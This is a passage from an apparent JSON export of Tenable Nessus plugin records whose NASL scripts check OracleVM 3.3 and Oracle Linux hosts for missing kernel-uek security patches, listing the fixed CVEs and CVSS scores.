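(CVE-2017-9242)\n\n - posix_acl: Clear SGID bit when setting file permissions\n (Jan Kara) [Orabug: 25507344] (CVE-2016-7097)\n (CVE-2016-7097)\n\n - nfsd: check for oversized NFSv2/v3 arguments (J. Bruce\n Fields) [Orabug: 26366022] (CVE-2017-7645)", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0173.NASL", "href": "https://www.tenable.com/plugins/nessus/105147", "published": "2017-12-11T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0173) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105147);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n 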
script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0173) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - tty: Fix race in pty_write leading to NULL deref (Todd\n Vierling) \n\n - ocfs2/dlm: ignore cleaning the migration mle that is\n inuse (xuejiufei) [Orabug: 26479780]\n\n - KEYS: fix dereferencing NULL payload with nonzero length\n (Eric Biggers) [Orabug: 26592025]\n\n - oracleasm: Copy the integrity descriptor (Martin K.\n Petersen) \n\n - mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook)\n [Orabug: 26675925] (CVE-2017-7889)\n\n - xscore: add dma address check (Zhu Yanjun) [Orabug:\n 27058468]\n\n - more bio_map_user_iov leak fixes (Al Viro) [Orabug:\n 27069042] (CVE-2017-12190)\n\n - fix unbalanced page refcounting in bio_map_user_iov\n (Vitaly Mayatskikh) [Orabug: 27069042] (CVE-2017-12190)\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. 
Petersen)\n [Orabug: 26277600]\n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126]\n\n - ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126]\n\n - ping: implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. 
Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306]\n\n - timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)\n\n - mqueue: fix a use-after-free in sys_mq_notify (Cong\n Wang) [Orabug: 26643556] (CVE-2017-11176)\n\n - ipv6: avoid overflow of offset in ip6_find_1stfragopt\n (Sabrina Dubroca) [Orabug: 27011273] (CVE-2017-7542)\n\n - packet: fix tp_reserve race in packet_set_ring (Willem\n de Bruijn) [Orabug: 27002450] (CVE-2017-1000111)\n\n - mlx4_core: calculate log_num_mtt based on total system\n memory (Wei Lin Guay) [Orabug: 26883934]\n\n - xen/x86: Add interface for querying amount of host\n memory (Boris Ostrovsky) [Orabug: 26883934]\n\n - Bluetooth: Properly check L2CAP config option output\n buffer length (Ben Seri) [Orabug: 26796364]\n (CVE-2017-1000251)\n\n - xen: fix bio vec merging (Roger Pau Monne) [Orabug:\n 26645550] (CVE-2017-12134)\n\n - fs/exec.c: account for argv/envp pointers (Kees Cook)\n [Orabug: 26638921] (CVE-2017-1000365) (CVE-2017-1000365)\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory 
leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with '.' to be joined\n as session keyrings (David Howells) [Orabug: 26585994]\n (CVE-2016-9604)\n\n - ipv6: fix out of bound writes in __ip6_append_data (Eric\n Dumazet) [Orabug: 26578198] (CVE-2017-9242)\n\n - posix_acl: Clear SGID bit when setting file permissions\n (Jan Kara) [Orabug: 25507344] (CVE-2016-7097)\n (CVE-2016-7097)\n\n - nfsd: check for oversized NFSv2/v3 arguments (J. Bruce\n Fields) [Orabug: 26366022] (CVE-2017-7645)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-December/000804.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08785912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.20.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:15", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing 
necessary patches to address\ncritical security updates :\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600] \n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126] -\n ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126] - ping:\n implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. 
Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] -\n timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0168.NASL", "href": "https://www.tenable.com/plugins/nessus/104454", "published": "2017-11-08T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0168)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0168.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104454);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0168)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600] \n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126] -\n ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126] - ping:\n implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. 
Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] -\n timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-November/000799.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?82da82bd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:38", "bulletinFamily": "scanner", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.19.12.el7uek]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n\n[3.8.13-118.19.11.el7uek]\n- nvme: Handle PM1725 HIL reset (Martin K. 
Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
\nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3636.NASL", "href": "https://www.tenable.com/plugins/nessus/104370", "published": "2017-11-03T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3636)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3636.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104370);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3636)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security 
updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.19.12.el7uek]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n\n[3.8.13-118.19.11.el7uek]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
\nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-November/007321.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-November/007322.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 